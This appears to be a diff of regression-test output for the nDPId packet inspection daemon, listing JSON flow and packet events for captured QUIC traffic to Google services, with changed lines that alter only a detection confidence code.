02296{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1621421257105,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621421257105,"pkt":"AAAAAAAAAAEAS1QMCABFAAViPbFAAH4R97iokEAFcAFpitokAbsFTiafzP8AAB0IMK4bzt32gQ0AAEU0P1azBnSUVl3HX4NvBpNVZqFjb\/POClmZ90yDhIH3saXV4D8hIZuhFmh5K80mFHsQUDzJ5Fet2Vi6MVVm5vzpbtDzb3iZEgIWreSd3Ir9FMXdj0HVjyEDw6EuT6gRAjE\/21rarOXtm19YMu7r45cH8xqJwZu0MlI7uXzcE9RAeMgLEW6YsSaB9O66L2651H8GQJ90pVw7t2KzRklpg4gkXdUjv94LX0mxpP01vTf1Uur6iVP0hra2u3O5GqhBWtCeqqhiUxynXsEiIqqL7erxJ4C5Ceo+YBLOH7PyZpxjMcY0M8UKVHZb40RZzejcLgSUNrM70SQtZDilREUjdX4V1RitcpSnBwGOqBO33JSlA32uZ9lAm7tfb4HtFuyOK7Y6+s36I\/tJjlWkNcLN5vycOCCgMR\/iEDhDBTaJipsDN7UZescDsrCVRT5tibuo42Z352l3NEmt8qok03JQNTlENsa+Ywn9406L57nvC0pFdYqO6XoWy3oIaLpLL2+6gTc60MDWTKJ1UrBBU+uti2j2vV131OfFLy9NEug6HDeJt07pHoN0abz03ktCcugMdfCJCqkojUbtwT7bcr1xv+H+nfxzLGaBENVle48BJL9n\/fQwRUFpWqNRw5YGEoFUAxgSYLrjI3+8yOHpS2TW54iDb5TgzKjzNgy7VC2hqyxs\/JyaWpx4tfVLM7fnb3BOMLq3RoDDAtkcsoDjHUMbZOotwqG7NOHSskx0+10KvcYYmNrJIaQaFda2wEUxuliGNz92g6FqP4oZMZQBZxkpxPDgYdYLuH0duracuo87qqjlRGPQapq15Je3yha81nzNRXHTDeNDxWfcXJluZNq0kt+qGDFlSY8n8xUueL9DqKmN1IsXo0X0yoNp38aEiv4BJxrbHkZ8MuGE\/2IEPBTeie7PMbLFS2yJwVIy5h4KShSAWHX8g3+pMhTlu25endl0GCcr5li4yhDfLpQ3S0rInsXaqmpIA6OYG89d6KlcK52aGKa5+qjgFprLpAqwYT5Z65JHNpW+TG9KZbT2vFhcZengw3A92EI\/TcEXiRfmF2ssJ5ysj+mCfUOmyip94PexKb+mHdBLChKLXIrLeY1uTln0pTICSsA32Tt+soXhVUyCfGQOxc2GxwvPc6T20BN51nQPn600Q5UViN3viKdCuJEUlNLh+yWrsxCBLb17rH5uegaqgsAUwjH1c2UBlUjKpOyFZ+vURC9HPm3ZN\/AmFoBypd++hTChaH8TxLeog0xRzbwHCm0PbKFRbASn2bhiLaCoa2lU2VL20lJE+ax9ltZKxjkLaHbInU1egJzE5Ozq274xYL+oZA2MHpO\/SvXg5YcqmFZBb7QU7uJnGtoC6VyfqEMbfITMloZv6UlVclDscyjvESn6K4S5HE2T1Di30EscldcqKgvxZsNQVrOrtKLdcYnpHdO2rWcwupv3J3uhq2VmkdCL9eV1aP+\/omm+CRR4vmacmNO+0VUXWSYWY1o0ANvSXclIcPCmXoAeFks9hejblFemNUPDYGzI5F7uu7XOa7qRlrb4VRHYDm+IGHatsOChH\/ovC2i1ER0eU\/ZmnhnIkZU97Pyha243JnjMkAwY9QrCN0+FUsuH91rZG9m+lGHaPJ\/jVLdm2lAyDFa+zibx5uvSnW8CxhmkBIgZ+LcWtx9SaKCxT1Vc9Xf2EVqaZNITbzO2oIGdrJDJ4HVczVgPNlPqogSnBzFP5Ik8qoDJ7h6Q4BUKLPyjQd\/ev7WJ1EEQcjfoVc2KFDAa9tCVQaFSH39b"} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421257105,"flow_last_seen":1621421257105,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621421257105,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"112.1.105.138","src_port":55844,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"quic": {"client_requested_server_name":"android.clients.google.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421257105,"flow_last_seen":1621421257105,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621421257105,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"112.1.105.138","src_port":55844,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"quic": {"client_requested_server_name":"android.clients.google.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}} 00630{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421260215,"flow_last_seen":1621421260215,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621421260215,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"37.47.218.224","src_port":59827,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02307{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1621421260215,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621421260215,"pkt":"AAAAAAAAAAEAgb5NCABFAAViPkBAAH4R0KWokEAFJS\/a4OmzAbsFTgQMzv8AAB0Ij53aBXaFj90AAEU0SLKO1gj8GM\/7BPKLNut3gQPWBzQn5YjeWsRqAQjUyhVmdT7iLh+mIwvgIVvzUOLJxhHjuQctv0LRX631bbBEMMF3pBOdFjFZQIZkKsJpfaTuV+rwxUnU2bHKeVloIebl9Hd03S1kOttznSJAQXPQYVQdCo2nGLaWCR4YNzOkZh4A+Iglp3ynlFiH1Kgq3ax2c8pTIXpNl9L3OjDkEQQYoqa4BnvX26mCDoVc1q85ueAmXRWZdEScZQq5AdybLm23nnSrRgIVtgrwmK88QIPr5bJG3kChUFNEb6Qj326VwodIu2nJl3TnhY2xrD54TcIiyK8M1mjcjF66nfwNKkEIT6E\/SESFufOVlvOb\/aB7WAdl9ft+Mim9U4BlJLbA1M2hEMXyNr\/s6u+cjHBsYueURjL6cyap74D70FwK4fSE9fk3xYY2MNPKF\/BAL97jnAn1k6A2tqzJHsZwSzyyXpoLuyctUW\/+nvBXA28d0MohSUQ+k04\/p827rPYEI2AWonQSMbQCAz0aXMWa9QgMEzO1kdWGqTKHT6GRgMR41luSMkba7gddevQoGSDn8n\/q9o1I96kD59QkNrWXvBgRpPjPEDuAZN3lTvhkhI1wkMsnQCh+3FDr1mc7ThSOHVDvrHj1Lm33pCihRhcviFSvDh9KDt2ldWi8CRH3IP27mXAgwEWN7MW58CZ7xIfXHX426siygUSb80QcGh0MbC2cqC6NdXb7jwDX+dBo9j\/62Zx0AC29OcRJNYu2PToqGFzb0MsLqQh6dq9QT4wGAMMKTUCoC77oTHhUvrLWjGCXOjuULsdJuEozP8mmiwHfyW6om2UpbFP3XUkziu\/vMyloESiBOvaG1xmOFxFd2n7o08eusUshscLGHeSq3kK1TNkYBgJH7lGzZYlF3A1w0YXAbAoRDewGZBRGgAycWnJxG9uq\/6QiUS5MkDVeUWNCVal9TwMX5\/i+60rZCuCCsNfpwFYF65Kddt1lyUiJ3yQQ3yrEC81\/+AlvSh0nVJu7TD4+IV4yfqhOezTjS\/jq7q0STXO9D1O5OiHCPhH1vWKx7PnZg2bufgr0umZWt9\/ulektccxj\/7G2bU+FhscpVONsqMMSe8nszXl1RfQbopA6Lr2XL+yzBEuqedNG\/oarLdzVzfbciDEAHhtO2umw8IL7MpmOpbUsppzeNfDP5NjrfxdP3ZZ6+53+pyzcLVc1IIupv0HiBGLs39L3xCnLaO9KJhlGu4\/NgXTntIMz6nwsIjU3XYs9p681vW714W+A\/9BGND8qAN+OH91XxSG84vJV\/6Q94Q6u6XMjJ1a8fRCqQvwG6Y6QlpageJG0MkaaEcPNuZR6lcsvvgXozmz12VWNDD7XlkC9RlIetaFOlO+wCjrAWaaad7F01KTsrONi0Minvqx6ZjHIYa4CdvnQmfIFPvRG2dbtVMue5p2IpRYRTQ00H124FWSAbpmFufFkxzz3roNFvZ8L48qlRvbqfoHbzlo+diCyOjTzCaiLy3wgom7EMWMSpa1wNanraUOP0Cgafhkkk58UkpZ84qvXH6P3NJfusjarmU4bkoENsKKZG84yQKYpg9lzqxivHXVnRw8D\/wblKD0B6HjUVdnwNG6dMjeNePdobGQc+ezoD\/iBkZC2nsQG9kk\/83\/KYDIo1frQ9PGAUp9fb1fO3JXbQdb7gxYJ59BL9yWuwgkXl0w63hIxIfYXlPi6Ly8hrunM3g6mrjaqyyX2Rcbv6s+jqMK\/tNm146acDlsVlCvaDwMeJ0jY3HGC1re9"} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421260215,"flow_last_seen":1621421260215,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621421260215,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"37.47.218.224","src_port":59827,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"www.googleadservices.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421260215,"flow_last_seen":1621421260215,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621421260215,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"37.47.218.224","src_port":59827,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"www.googleadservices.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}} 02316{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1621421260513,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621421260513,"pkt":"AAAAAAAAAAEAgb5NCABFAAViPk5AAH4R0JeokEAFJS\/a4OmzAbsFTtDzzv8AAB0Ij53aBXaFj90AAEU0pVcIObrUqLyarXAGM4rQnKh+52v7aXQUj4GvYb\/wSM3mSBNf9xPhl9FK4ipC+fhOPIGStb9x1zMsHAo+73hJqwqHkOJ6bvqIt\/sGsmK\/ofAbwetCqPp3T3jPrhZY2wETFAN+9XScTYEDqUnrkDVy0GQ9sV5jSug2PtRHEWT8gywc4K+57NH6Ash2BqW8UNx67owC0vArWq8CvngpIrDNQreXdzSYn4wwYJX2miwA\/wEl0gm+SuEtBprHj2uZlu8koRLbrv1VGIheOQE0Nsbta5SQsxKKjZN97iHSxerp4BcNtjqivy7Li78i5gH\/2pVLdrR0qv8negi\/kKSblvjfoEPy4ijg9\/u4RIwFeksyqF89on0NdQuL2+Gj5diZo+zdIi+Q5e5It+HBsRtpXguuRB6SEpGadVpkaDn0YwXpYgs1txuTawl7yQ4ZuSlTzVEDd7qtQzM6lSpvLx3uSWpFvM3GAUysnOzVg41krR4Ulkj+VTnN5KAol+nOz6IUyDJ\/IkiNKdoNBVXk9AvQ0S1r+og06pTejXAB5wfjkpZVXgsRY+N\/xjKDMGEVHELh5Epoie736CGpcBsBBIKZcR8DMnHyPpGJLzAlOtKDi7\/Gt1\/jx+MHSSEKCZ4TotHxg\/Xf1RgIKf3lQnbUe3aB\/BOL3vek35mgVs7wyrmKZQpuJFMrj\/LPS2T3Q6UihyVSZ+cz9VtJhU0kIVXZbg7MeMCnqgv\/yNMDFFdkvKL7oO\/uUcUXQlY5VoYeeWgNSKc3XjyJMIAV+31aTEM5FsgjpZRp0sNQm59Xb20piAIn8k+RicW\/PxKQpSBnnGgYgJK8jaPlnBgEXw4IIpTVsui1MIn1bGpT5SlOh5TYtcpeX7Eq2Gn++tj8GvDhyQ4KPUI1FbbJ0NbqPqngUTYVzF2pjPV2RsKl8tMqOs19XG5pvHEWTNic8cZYT8FgNSHC44qfM5PGUK0zq0\/PiawZaqUQYRh2PCe37WABPV97AV1GUOIJPd1hL9x+acIY52OdywDA\/3ZRhz5AH3VOtXi6eFcGzu2Z1on4V\/38mIWBpYZnh4O771WNLcVabHuK1h65ee736lPwAH1pmFpETlxU2aR14ZxWeG\/L1t\/uMh1SsDCguq7KQ7kO6W6v78BBvY3UFcMUOQm3Y79YpovoK3RKpLlQwqcGToRvTj9HWy45cQaegkrn6dkZvlPtVXm4u0bH0vMFgb+e9S\/Eo9e7MRlTrDXo2UnQkJhJrgWtcgvYsSe2mckaREDq5dc\/ejmdjc6w7425wByLtdYkeZKJsBJlRzzSwJcvg13az06KgVs\/MgeRqXRnkapWJu4JtcC0OoEfpVDvdMByMpq6F01Orvj99pih8TBfE5K9cwc7o7eRFGa\/vbR8mRB4vs\/zIS2xlYSXBpmrEq\/STtlWQ3MwDGTQBh6b1fNakGwhN+beHXCdenc2JEHwzcegc84ZFNYAaFHvYtEA5j\/sdHZ5R7zQpmw8s757IIPaEVgddHeol88L1qAA1ESXtRCjHYy+RZMYFJvwihgljin3jiK2udMMWEQO4P1W\/JF0TJv+oob679cUTxkmK0rhv5xSAjzbEBoPpZkQFmxUaC6gROBGQvRXx3h\/KdYcwayetIOWHEWFh0VV8+Wh3MzCdnjJMXP+plFSgGMbc+RC\/vLnsb2eKO8LMYQ0pI9YKYByfpqJs3guXOtrpg3uzEalWzsyVUl9MKGOQYcVvIVpCkpNZnvU\/i5cNJONYeYNbIy\/q5jUt2zwSPACITT+6UtXWpul6XNl"} -00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621417628801,"flow_last_seen":1621417630732,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621421260513,"l3_proto":"ip4","src_ip":"147.196.90.42","dst_ip":"177.86.46.206","src_port":61647,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621417628801,"flow_last_seen":1621417630732,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621421260513,"l3_proto":"ip4","src_ip":"147.196.90.42","dst_ip":"177.86.46.206","src_port":61647,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 00632{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421316093,"flow_last_seen":1621421316093,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621421316093,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"241.138.147.133","src_port":51053,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1621421316093,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621421316093,"pkt":"AAAAAAAAAAEAVM4PCABFAAViQV5AAH4RSIeokEAF8YqThcdtAbsFTsw1yP8AAB0Id4dqLmNRgiwAAEU0wtYlbbuFGBXp2MCVE6We3QfitRrLbfHeFapauAVaYK5AL9PTMbG\/nZBDDFATIm20jlpnFDBXnrozoSQkKhZiwvFuA+YJAKUvqg2QPKM3oU8xpfKkT2AQR0J9DkN5tfQ0NXF6X7eJrYc4ofmRw8O4fWLwYHZ3YywSIJBBxpk3DxsC2udaDZJvqGhhrqx5lxHNdgWl7nWJub5bWqgA7RiFwSfPMI\/5kRug+dhYRp7DC3Ee8zC6gPghQE+QP0amaa1arTeTP0yuasl+WnsmI9atR02R+W1DzVE2\/wBMK8xOVHY9tqlEVzRvN\/FEe84ZW3K+FiAVxrMfFrQuHuvcnbcHTHBnMHQYqazejyT6z7dujWBncKjH6yckijpEXWZXNsAuDtLV5T3g2q3nsAzYqPmxjAwq2L9jEUkACO\/glUxPaUIbzRZMAWrn1JnfawlUtFWDoUkmp2jeSdN3M4DOV4Btcfl6JE0S5mBMR+cTfbMcWTfdpp7BQFYSHPJCCmfpgjfpU+1qBx\/swhbFbhxpxlnelvZfSKLGYtrKIMbdO3dvXbJ\/svUATGYLFdU0QPDusq4rUjjYNOu89YeAlu27MHBziCZnV7KQ\/7CZZ62vBer12fSYwgYC9kFuhA1vCwIWWEI0nqiCF8WEuILGWjP7tGrAuxfQQVo5hc9wDgMsePag6LNkwHcnSN4R4KOS1V6VWYmSISoheOtUuN0\/+N31BX\/BBdcE+K\/zMLfLAbEeSVyqVT8J149AtoSXuMJboIYDsPyuNx1sUrvqH1bQF\/7OvXtx\/cdwuq0y9FpLI4rLUI2maANSTyvT2wXdthl04Z\/YTlfhB2d0v18nfSnZ0lHIWro94Qz9tRk3pZNg\/6bOm24Nb0c7krS9oaKWYD\/nW26GWKUOS\/YmbucW\/B1591GDEr7Vz9Medns2YxuZHMa760vt8vLL\/edsarlqSTG7iC2dyVOn2D7FBqAY9O0XPf2C6QywOMobFqtrNOS8\/ww+Ef0n0CBYfsd8N\/A33enCbf65kj2J8cjGSNsKKNBj4tAphcU4pREZZB+O3\/Ly1nrLSiPKqvrwDlraB5bWLyenPZKnd0anwZjJixIGkNqzXa4ISQSJFmR1apCq9LxUfCQKJSnoHJi7zWpvIrTdh+1E4LBshyGiVHdr861ZeGlKojdwmnjQq4UIgYBm588gXH6fnrUcTY6x5R5SkG6ySP3+9FKCni2sN+s4jOB1WugJuAizD3hNzwNrPVPmY7ea2u9AgEEAbZ5tqDi\/qty5LhlhUJfgz0tpuOOG5sjNxDfBKwkmMXzbB0UWP\/ZOymvNdRvIO7mkPx8fUewze1kB2XBKTZu\/jjeqOfyykDMv2U5d4ECIcR1ME5SBUPF+cG4JDZip3X9Ncjk8ohwZ9STseLqJ9OTjbovHrwRkTp9ZFiBkXSVMJZ28qvMwt56L7k\/AJJHbrnWAxnK7I23CERceW6rAMx3gAvjR7jpii0Z6y9ut3843URcFEKSmPwW484nhFdNDcZj2opvoj2jz3w5PYglOwvrlo53izXLdla3jEPq0EWSsFCgjfCn1Hu\/0iFm0F9A\/NJaZOLHbBv95sOyVAyhhTp9ia8OHAoDyKO3fdAgduAMCr8e4e6A6OeMRMM9uZdO8nPHniB7\/fRhFarX8\/hBQLOvGYNTxmX4mUBEYAvdX9oiTEGFxFQYms4wxcWEcL4GBZVSteaongl\/UtzVPYTVaH6Ywp9r8fQxMP+pvN9mS74aDwI6voKY5QYc+FIAxKgJlDQtsiDCfBJp7"} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421316093,"flow_last_seen":1621421316093,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621421316093,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"241.138.147.133","src_port":51053,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"content-autofill.googleapis.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}} +00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421316093,"flow_last_seen":1621421316093,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621421316093,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"241.138.147.133","src_port":51053,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"content-autofill.googleapis.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}} 02312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1621421316389,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621421316389,"pkt":"AAAAAAAAAAEAVM4PCABFAAViQWNAAH4RSIKokEAF8YqThcdtAbsFToluw\/8AAB0Id4dqLmNRgiwAAEU0su8kgEC6CAiECyO1DkLdw6Gs9g5xqr46q4bXQKhwHnhSO1cvEZxiK8zZ0UUvMHGZI9iz4bjhoHMMbIOMlQjzD7lXKLskiaS9BH5d+nSpKWAlTk\/VzCyrJIDUEaoJEECyuW3tKvwl9spRker8xQmMYntXENQ02IwoiaKvWtw+SOjVwVA8eWlOm9NAMebNzUMZPYZs73GU1OPqu9byjmqUVZ3gNjVQQ\/nOwz51imkNuYu+w7\/8LyJUGaPm5Fwuk3Bsj2YKxipADsvK8J6MTwckTe0mCX\/jSQ76gOCjnkz8hrVtk4EjqvRSRrrQmlglk\/VPrf\/qKvU58cAcB2xVriX4o5h7C5eOAMRU3+HqrLXNHljg7aEauwVEO8m3ekwDO3icqHHRs7WM+ylBxpldD58pCtxwZ0ij9QfdRWH5ZxqEDPqJoHBdj95wIyZ4ORnYdmNnyGHi8MllAUcQIs8tjWMWB3yoe5EdClD6nZBCG59SvjdsYcNJAVVbBE80ehJfa\/upspBC4CISksJmbwdDStCmaDAP9wtOaXIqg9O5ZkIDmdoOOPEfmjm9K4dOQ6LB36bvZXw3SHE4hzY8DBpxFYHrnweWWjg3jzTy7z1UBgCcL5L8M3V1G4k+M8cjEG+qLyzWt+I0t9W8p+QppsTxLemIrKhRlTLQxRaQrn45B1vfZAeZl22mIthc1844odpSJYhOqC6tqIizeYmhjyC8Xc50S3AW5Mvlz9zSASlezjlHYB6l0h4HiECb78KTFOP0RzpXeC761f6XbR3TSUj2Kd6CiigfBxHImCUWBJeYhQ63K13s3Mm3\/yXQW+jtNDe40QrWm9YjjkoIVMSIWB0+IuXcOTK5iuV5r2NouN\/mq7KvUEJUIOslfnalmFaf7ZfIdPjgyQVz9FrKHnQkvaAtpM4SfwUn5akQL58gGN5ju0ezdhVBAUVoBrH7IQl1dE5m2gKH\/nc0+RTVVCbReUNeb\/d89W9jKsi0qHAjg830USO454jnFfGNPY396nJq\/esXpli7iKbr\/IAN7feLYAiWUNShRLTeLj0DM+fUbWyB7fiC2WAV\/4DdYTKVEz03e+e0crF+jhU0\/1fTcsMLkra8V1CBeXadKcji8HnzmIEixBMdXwKZYUWkoYB+sbVXni\/V+D++lf65eXUFF31BC5lP3qxi9ycB00LRdjtUjOItXt+m1hKug2VkfXSqpqc3\/GtG5atDCNyPml8KVYSebQNsNdtmEfNkMvyIkKWIyHjBBCaaBUw85r3hizTmBO4zshJ54arJGmqYVjcViNP8016YDZ66VoiHKaJw\/kSImQpkWf0lmgqvatzHhJ\/LfjV6hqNjydlZCW3sLZFOzRqsHvU5fI\/FmsYH8YkApnb+m45Kx2rJzSfYc+L2hlvF4a7+7fNL+7iaVFfd\/CRuXc9u272HHy40jLVNdRPqq4VV3rne\/q0H\/V1m8ntT3AELDOezhMgwVdok3Al1xhogWoqppG21ACx3PuonkAEFwkyjAL9ONzWF8DLDGXAOEdTah38TMQ2tg2FGelPV6Zo48hsuS172HDmBfJNthoNpqM6oYASTG\/RxdJdiw6zTrPbRM1ewux4TQduH6K6D3mWsV29BQOTHS0XXpDSszpB0pT5xkizyunUsTMnSmkyD6zVNXzQ5EMXzILn\/+7F\/G\/+5jctdI6\/dPPPLJpa6WPKzVPzwwzbjqGjx703Yxr\/kJULthDE\/zZhbousd0J3udWSBLz+4ztsXYH8xhH3IUM9oirjdGfttWqzyUvhSRYzH"} 00598{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":18,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":18,"packets-processed":17,"total-skipped-flows":0,"total-l4-payload-len":22950,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":0,"total-updates":0,"current-active-flows":5,"total-active-flows":7,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":35,"global_ts_msec":1621425498439} 